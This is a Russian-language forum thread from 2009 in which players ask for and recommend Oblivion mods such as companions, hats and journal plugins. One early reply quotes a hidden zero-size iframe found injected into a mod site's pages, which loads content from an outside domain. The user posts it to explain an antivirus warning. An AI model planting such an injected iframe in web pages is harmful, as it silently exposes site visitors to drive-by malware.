Тралл Опубликовано 28 июля, 2009 Жалоба Поделиться Опубликовано 28 июля, 2009 а нигде еще нету, а то при заходе на сайт антивирус ругается.. Ссылка на комментарий Поделиться на другие сайты Поделиться
Олег Барс Опубликовано 28 июля, 2009 Жалоба Поделиться Опубликовано 28 июля, 2009 а нигде еще нету, а то при заходе на сайт антивирус ругается..Там на сайте обычный вирус, пишет в текст страницы (два раза) невидимый фрейм:<iframe name=PS_Al src='http://71soldo.info/t/?PS_Al=ТУТ_СЛУЧАЙНОЕ_ЧИСЛО width=0% height=0% scrolling=no frameborder=0 marginheight=0 marginwidth=0></iframe>Что там дальше не смотрел. Это админам тамошним надо сказать, поправят. На сами архивы это не влияет. А вообще, выбросьте ИЕ и пользуйтесь нормальными браузерами. Ссылка на комментарий Поделиться на другие сайты Поделиться
Tocka Опубликовано 29 июля, 2009 Жалоба Поделиться Опубликовано 29 июля, 2009 ТЫ без неё и шагу не сможешь сделать!Я без неё вполне играю. Но задолбало переключать её на задание которое не выполняю в данный момент Ссылка на комментарий Поделиться на другие сайты Поделиться
CemKey Опубликовано 30 июля, 2009 Жалоба Поделиться Опубликовано 30 июля, 2009 А нет ли модов улучшающих даэдрические святилища, а то убожество какое-то? Статуя и пара тройка поклоняющихся. Ссылка на комментарий Поделиться на другие сайты Поделиться
Рогел Опубликовано 30 июля, 2009 Жалоба Поделиться Опубликовано 30 июля, 2009 Ищу (а если нет-прошу сделать) реплейсер тел скампов. Хочу чертиков! Ссылка на комментарий Поделиться на другие сайты Поделиться
BrainDemolisher Опубликовано 1 августа, 2009 Жалоба Поделиться Опубликовано 1 августа, 2009 Посоветует ли кто красивых и оригинальных татуировок для женских персонажей? Желательно, выполненных в качестве одежды. Ссылка на комментарий Поделиться на другие сайты Поделиться
xAZOTx Опубликовано 2 августа, 2009 Жалоба Поделиться Опубликовано 2 августа, 2009 А есть плагины на инквизицию??? еретиков и ведьм жечь.... здорово же Ссылка на комментарий Поделиться на другие сайты Поделиться
Airwind Опубликовано 2 августа, 2009 Жалоба Поделиться Опубликовано 2 августа, 2009 нету вроде. Да это и не особо лорно. Ссылка на комментарий Поделиться на другие сайты Поделиться
Xiamar Опубликовано 2 августа, 2009 Жалоба Поделиться Опубликовано 2 августа, 2009 Подскажите пожалуйсто, есть ли плагин для Обливиона добовляющий возможность писать на пергаменте? Ну или что то подобное этому. Помню такое было для Морровинда. Ссылка на комментарий Поделиться на другие сайты Поделиться
bi-666 Опубликовано 2 августа, 2009 Жалоба Поделиться Опубликовано 2 августа, 2009 (изменено) Подскажите пожалуйсто, есть ли плагин для Обливиона добовляющий возможность писать на пергаменте? Ну или что то подобное этому. Помню такое было для Морровинда.Пока что вспомнил изо всех плагов таких только Kyoma's Journal Mod, но сия позволяет писать только в дневник. Изменено 2 августа, 2009 пользователем bi-666 Ссылка на комментарий Поделиться на другие сайты Поделиться
Xiamar Опубликовано 3 августа, 2009 Жалоба Поделиться Опубликовано 3 августа, 2009 Ага, спасибо, тоже пойдет. Ссылка на комментарий Поделиться на другие сайты Поделиться
warlord Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 датей плиз какую нибудь компаньенку хорошую) желательно рассовой принажлежности к данмерам Ссылка на комментарий Поделиться на другие сайты Поделиться
BrainDemolisher Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 Нишку, гм, пробовал? http://ХочуВБан.ru/file/ash-elves/Вот, попробуй вот это. Почти данмеры, но красивее. Ссылка на комментарий Поделиться на другие сайты Поделиться
Inferno Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 датей плиз какую нибудь компаньенку хорошую) желательно рассовой принажлежности к данмерамХорошие компаньоны. Данмерку нашел только такую. Ссылка на комментарий Поделиться на другие сайты Поделиться
BrainDemolisher Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 (изменено) Кстати, компаньонка что из пепельных эльфов чудесным образом похожа на Деметру .Может, автор у них один, что ли? ~~~Инферн, да я знаю. Яж вон как тонко намекал) Оёй, простите, зафлудилсо... O_o~~~ Изменено 4 августа, 2009 пользователем BrainDemolisher Ссылка на комментарий Поделиться на другие сайты Поделиться
Inferno Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 Кстати, компаньонка что из пепельных эльфов чудесным образом похожа на Деметру .Может, автор у них один, что ли? А как же. Принц Безумия собственной персоной. P.S. Извиняйте меня за этот невинный флуд. P.S.S. Браин, ты тоже не флуди. Ссылка на комментарий Поделиться на другие сайты Поделиться
warlord Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 только сегодня эти плагины смотрел, деметру ставить пробовал, но вылетало. там у них требования не понятные((( Ссылка на комментарий Поделиться на другие сайты Поделиться
Inferno Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 (изменено) только сегодня эти плагины смотрел, деметру ставить пробовал, но вылетало. там у них требования не понятные(((Давай объясню: Требования: Oblivion + SI + CM Partners Basic + Elves Of LineAge 2 SI - Shivering Islands (Дрожащие Острова) - офф. аддон (но думаю, что в данном случае это необязательно). CM Partners Basic + Elves Of LineAge 2 - моды. Скачать можно на том же сайте (наверное). P.S. Я, правда, и сам не знаю, что это за CM Partners Basic. Если хочешь, можешь спросить на ихнем форуме. Изменено 4 августа, 2009 пользователем Inferno Ссылка на комментарий Поделиться на другие сайты Поделиться
bi-666 Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 P.S. Я, правда, и сам не знаю, что это за CM Partners Basic. Если хочешь, можешь спросить на ихнем форуме. Мод, добавляющий дофига компаньонов, да таких, что к ним можно добавить любого непися с помощью КС.Требует OBSE - Oblivion Script Extender. Ссылка на комментарий Поделиться на другие сайты Поделиться
BrainDemolisher Опубликовано 4 августа, 2009 Жалоба Поделиться Опубликовано 4 августа, 2009 Я добрый, эх.http://www.hazevalley.ru/plugins/cm/index.php#cmВот здесь найдёшь CM.Ну а вообще, если уж ставишь плагины, то даже стыдно о таких вещах не знать. Ссылка на комментарий Поделиться на другие сайты Поделиться
Принц Безумия Опубликовано 6 августа, 2009 Жалоба Поделиться Опубликовано 6 августа, 2009 Помогите найти меховую шапку для обливиона. Ссылка на комментарий Поделиться на другие сайты Поделиться
kisn Опубликовано 6 августа, 2009 Жалоба Поделиться Опубликовано 6 августа, 2009 http://ХочуВБан.ru/search/?q=шапки >_>поиск рулит Ссылка на комментарий Поделиться на другие сайты Поделиться
BrainDemolisher Опубликовано 6 августа, 2009 Жалоба Поделиться Опубликовано 6 августа, 2009 http://www.tesnexus.com/downloads/file.php?id=17705Разве что такое...Впрочем, было нечто похожее на стильную дамскую шляпку (не в стиле соломенной, а именно будто меховая, как у княжны :queen: ) в комплекте броньки/одёжки от Hentai под названием Dark_Rose, но к сожалению ссылку дать не могу... Разве что на полную компиляцию их работ. Ссылка на комментарий Поделиться на другие сайты Поделиться
leo58 Опубликовано 6 августа, 2009 Жалоба Поделиться Опубликовано 6 августа, 2009 (изменено) Народ, дайте ссылку на мод ООО и скандальный МММ. Изменено 6 августа, 2009 пользователем leo58 Ссылка на комментарий Поделиться на другие сайты Поделиться
bi-666 Опубликовано 6 августа, 2009 Жалоба Поделиться Опубликовано 6 августа, 2009 Народ, дайте ссылку на мод ООО и скандальнвй МММ.ооо (есть локализация, качать там же), МММ Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать учетную запись
Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти